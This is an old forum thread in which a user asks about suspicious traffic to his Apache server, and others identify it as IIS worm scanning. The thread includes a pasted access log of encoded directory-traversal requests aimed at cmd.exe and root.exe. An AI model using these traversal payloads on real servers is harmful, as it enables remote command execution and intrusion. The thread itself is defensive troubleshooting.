Page 1 of 1
Posted: Sun Mar 24, 2002 10:03 am
by MikeJ
i had a recent h4x attack on my apache server. I would paste the access log but when i removed apache i lost the log. It was someone making some very fishy GET request to various Windows services (including the command line) not in my http docs folder. Being the overly cautious freak i am, i blocked port forwarding to port 80 on my router and took down my httpd indefinately. I can still do stats i suppose but i'll have to upload them...
The IP seems to be a pacbell DSL user. Its the same subnet host fagpot (previous h4x0r of ;0 channel) has, but i checked its not him.
*** Looking up 64.166.157.125
-
*** Resolved 64.166.157.125 to adsl-64-166-157-125.dsl.snfc21.pacbell.net
I'm probably over reacting but better safe than sorry. I don't think my system was compromised.
Posted: Mon Mar 25, 2002 4:33 pm
by Lythium
lol.. dood, thats code red still in effect. all of my apache server logs are flooded with the cmd.exe and vti_private requests. It is nothing to worry about and does not affect apache. They are coming from a pac bell user cause the worm works attacks its local subnet. It gets spread to other subnets because people who visit an iis powered site spread it to the next iis powered site they goto. You have no worries of hax, if you want to cut out most of the spammed logs, block port 80 from everyone in your subnet.
Or if you would like I will donate shell space on irc.semicolon-zero.com for you to update.
Posted: Mon Mar 25, 2002 5:19 pm
by nemo
Group: admin
Posts: 133
Joined: Feb. 2002
congrats
Posted: Tue Mar 26, 2002 1:03 am
by MikeJ
Group: admin
Posts: 133
Joined: Feb. 2002
congrats
:confused:
Posted: Tue Mar 26, 2002 1:10 am
by MikeJ
64.166.157.125 - - [24/Mar/2002:01:08:58 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
64.166.157.125 - - [24/Mar/2002:01:08:59 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
64.166.157.125 - - [24/Mar/2002:01:09:03 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
64.166.157.125 - - [24/Mar/2002:01:09:07 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
64.166.157.125 - - [24/Mar/2002:01:09:08 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
64.166.157.125 - - [24/Mar/2002:01:09:08 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
64.166.157.125 - - [24/Mar/2002:01:09:58 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
64.166.157.125 - - [24/Mar/2002:01:10:08 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
64.166.157.125 - - [24/Mar/2002:01:10:19 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
64.166.157.125 - - [24/Mar/2002:01:10:19 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
64.166.157.125 - - [24/Mar/2002:01:10:23 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
64.166.157.125 - - [24/Mar/2002:01:10:23 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
64.166.157.125 - - [24/Mar/2002:01:10:24 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
64.166.157.125 - - [24/Mar/2002:01:10:24 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
64.166.157.125 - - [24/Mar/2002:01:10:25 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
64.166.157.125 - - [24/Mar/2002:01:10:25 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
Well thanks for the tips lyth, stats will be back up ASAP ?:D
Posted: Thu Mar 28, 2002 11:15 pm
by Lythium
block port 80 from 64.166.157.* and it'll almost be completely stopped
Posted: Fri Mar 29, 2002 1:20 am
by JFK